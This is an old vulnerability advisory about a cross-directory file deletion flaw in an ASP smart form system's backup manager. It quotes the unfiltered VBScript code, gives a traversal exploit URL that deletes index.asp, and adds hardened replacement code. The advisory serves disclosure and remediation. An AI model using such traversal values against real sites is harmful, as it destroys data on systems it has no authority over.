Ding peaks smart form system: cross-directory file deletion vulnerability

2010-07-06T00:00:00
ID MYHACK58:62201027497
Type myhack58
Reporter Anonymous
Modified 2010-07-06T00:00:00

Description

Affected system: peak peak smart form system (ASP) V1.0 Mini

Vulnerable code:

    elseif Request.QueryString("action")="del" then   ' action is passed in the query string
        f=Request.QueryString("f")                    ' read the "f" variable from the query string
        if f<>"" then                                 ' only checks that f is not empty
            Set fso=Server.CreateObject("Scripting.FileSystemObject")
            fso.DeleteFile Server.MapPath("./dbbak/"&f)   ' "f" is used directly, with no filtering
            set fso=nothing
            url_go "deleted successfully!","db_manage.asp"
        else
            url_go "did not find the specified file!","db_manage.asp"
        end if

And the link that references it:

    <a href="?action=del&f=<%=item.Name%>" onclick="javascript:return confirm('are you sure you want to continue to perform the operation?');">delete</a>

This link supplies the variable "f". The f variable carries the real file name, item.Name, and is passed directly into Server.MapPath("./dbbak/"&f).

Exploitation method: http://127.0.0.1/diyfrm/manage/db_manage.asp?action=del&f=../../../index.asp
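
One way to close the hole, shown as an added example that is not the vendor's code or part of the original advisory: accept only a plain file name in "f" and confirm the canonical path still lies under the backup folder before deleting. ResolveBackupFile and DeleteBackup are hypothetical names; the code assumes backups sit directly in ./dbbak/ and that url_go is the page's existing helper.

```vbscript
' Added example: hardened replacement for the "del" branch in db_manage.asp.
' Assumptions: backups sit directly in ./dbbak/; url_go is the page's own helper.

' Returns the absolute path of backup file f, or "" when f is not a plain
' file name that resolves to an existing file inside ./dbbak/.
Function ResolveBackupFile(f)
    Dim fso, baseDir, fullPath
    ResolveBackupFile = ""
    If Len(f) = 0 Or Len(f) > 128 Then Exit Function

    ' Reject path separators, drive/stream colons, parent references and NUL.
    If InStr(f, "/") > 0 Or InStr(f, "\") > 0 Or InStr(f, ":") > 0 _
       Or InStr(f, "..") > 0 Or InStr(f, Chr(0)) > 0 Then Exit Function

    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    baseDir = fso.GetAbsolutePathName(Server.MapPath("./dbbak"))
    If Right(baseDir, 1) <> "\" Then baseDir = baseDir & "\"

    ' Canonicalise, then confirm the result is still under the backup folder.
    fullPath = fso.GetAbsolutePathName(fso.BuildPath(baseDir, f))
    If StrComp(Left(fullPath, Len(baseDir)), baseDir, vbTextCompare) = 0 Then
        If fso.FileExists(fullPath) Then ResolveBackupFile = fullPath
    End If
    Set fso = Nothing
End Function

' Call this from the branch: elseif Request.QueryString("action")="del" then
Sub DeleteBackup()
    Dim fso, f, target
    f = Request.QueryString("f")
    target = ResolveBackupFile(f)
    If target <> "" Then
        Set fso = Server.CreateObject("Scripting.FileSystemObject")
        fso.DeleteFile target
        Set fso = Nothing
        url_go "deleted successfully!", "db_manage.asp"
    Else
        ' Traversal attempts and missing files get the same answer.
        url_go "did not find the specified file!", "db_manage.asp"
    End If
End Sub
```

With this check in place, the f=../../../index.asp request above is rejected at the first filter and never reaches DeleteFile.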